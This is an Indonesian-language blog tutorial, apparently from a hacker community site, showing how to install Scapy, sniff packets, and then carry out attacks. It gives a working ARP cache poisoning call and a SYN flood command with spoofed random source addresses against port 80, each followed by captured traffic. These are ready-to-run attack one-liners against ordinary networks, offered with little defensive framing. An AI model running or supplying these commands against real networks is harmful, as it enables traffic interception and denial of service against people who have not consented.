Cara Sniffing di Scapy python | Surabaya Hacker Community
Asslamualaikum wr wb. Oke kali ini saya akan menjelaskan bagaimana cara Sniffing dengan menggunakan scapy.
Untuk menginstall Scapy membutuhkan Python 2.x atau Python2.
Tinggal ketik di command line/Terminal anda
tumanganz@shcteam: ~# sudo apt-get install scapy
Setelah menginstall, kalian tinggal jalankan dengan command berikut:
tumanganz@shcteam: ~# scapy
Jika sudah, kalian install. Berhubung topik saat ini adalah Sniffing, maka saya akan memberikan cara untuk Sniffing lewat Scapy. Untuk Sniffing lewat scapy hanya menggunakan command sniff() yang akan mengcapture packet secara terus menerus. Namun jika ingin membatasi packet yang di capture, Maka gunakan command sniff(count=nilai) Semisal sniff(count=10). Simbol (_) di dalam python digunakan untuk nilai terakhir dari paket yang di capture dengan sniff(). Sedangkan hexdraw() digunakan untuk mendecode paket raw data yang masih berupa hexadecimal.
Untuk command sniff()
|---------------------------------------
|>>> sniff()
|Sniffed: TCP:2 UDP:0 ICMP:0 Other:0>
|>>> _.display()
|0000 Ether / IP / TCP 192.168.10.8:1337 > 192.168.10.1:31337 S / Raw
|0001 Ether / IP / TCP 192.168.10.1:31337 > 192.168.10.8:1337 RA / Padding
|>>> _.hexraw()
|0000 04:40:57.016356 Ether / IP / TCP 192.168.10.8:1337 > 192.168.10.1:31337 S /
\Raw
|0000 70 61 6B 65 74 20 63 69 6E 74 61 2C 20 6A 61 6E paket cinta, jan
|0010 67 61 6E 20 73 61 6D 70 61 69 20 72 75 73 61 6B gan sampai rusak
|0020 20 64 69 20 6A 61 6C 61 6E 20 79 61 2E 2E 20 3B di jalan ya.. ;
|0030 29 )
|0001 04:40:57.016899 Ether / IP / TCP 192.168.10.1:31337 > 192.168.10.8:1337 RA / \Padding
|>>>
|---------------------------------------
#Arp Cache Poisoning
Scapy memberikan kemudahan dalam melakukan arp cache poisoning dengan menggunakan command arpcachepoisoning(ipkorban, iptarget, interval=1).
>>>arpcachepoison('192.168.10.1', '192.168.10.8', interval=1)
Berikut ini adalah hasil sniff dari scapy untuk menganalisa adanya serangan arp cache poisoning.
|>>> sniff(count=10)
|<Sniffed: TCP:0 UDP:0 ICMP:0 Other:10>
|>>> _.display()
|0000 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0001 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0002 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0003 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0004 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0005 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0006 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0007 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0008 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0009 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
#TCP SYN Flooding Attack
TCP syn flooding attack merupakan serangan DOS(Denial Of Service) yang diharapkan mampu melumpuhkam server dengan mengirim paket syn secara terus menerus tanpa merespon kembali syn-ack dari server.
SYN ---->
•Attacker <---- SYN - ack. •Target
SYN ---->
>>>send(IP(src=RandIP('192.168.10.0/24'),dst='192.168.10.1')/TCP(sport=
\RandShort() ,dport=80),count=100)
Berikut hasil sniffing menggunakan scapy, dimana alamat ip dan nomor port seorang attacker di acak.
|>>>sniff(count=10)
|<Sniffed: TCP:8 UDP:0 ICMP:0 Other:2>
|>>> _.display()
|0000 Ether / IP / TCP 192.168.10.212:58199 > 192.168.10.1:www S
|0001 Ether / IP / TCP 192.168.10.253:45480 > 192.168.10.1:www S
|0002 Ether / ARP who has 192.168.10.253 says 192.168.10.1 / Padding
|0003 Ether / IP / TCP 192.168.10.0:44604 > 192.168.10.1:www S
|0004 Ether / IP / TCP 192.168.10.21:7474 > 192.168.10.1:www S
|0005 Ether / ARP who has 192.168.10.21 says 192.168.10.1 / Padding
|0006 Ether / IP / TCP 192.168.10.137:31568 > 192.168.10.1:www S
|0007 Ether / IP / TCP 192.168.10.154:1696 > 192.168.10.1:www S
|0008 Ether / IP / TCP 192.168.10.157:252 > 192.168.10.1:www S
|0009 Ether / IP / TCP 192.168.10.70:12435 > 192.168.10.1:www S
|>>>
Sekian materi tentang Sniffing menggunakan Python, semoga bermanfaat. Terimakasih
nyimak
BalasHapusjgn lupa visit : LinuXploit.go.id
Buset go.id :v
Hapus